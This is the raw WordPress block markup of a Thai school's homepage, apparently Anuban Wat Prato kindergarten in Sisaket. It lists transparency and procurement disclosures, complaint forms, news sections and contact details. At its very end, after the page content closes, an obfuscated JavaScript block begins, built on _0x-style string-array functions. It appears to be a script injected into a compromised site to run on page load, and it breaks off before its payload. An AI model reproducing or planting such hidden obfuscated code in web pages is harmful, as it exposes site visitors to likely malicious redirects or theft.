href=\"https://drive.google.com/file/d/1_OWLmL8dNlhDoQ0UR8jPN_Xxi6zx20T1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_OWLmL8dNlhDoQ0UR8jPN_Xxi6zx20T1/view?usp=drive_link\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1H4PRZlpAa4ZD6uq6Ew5Wx3nLXGcUNa09/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return 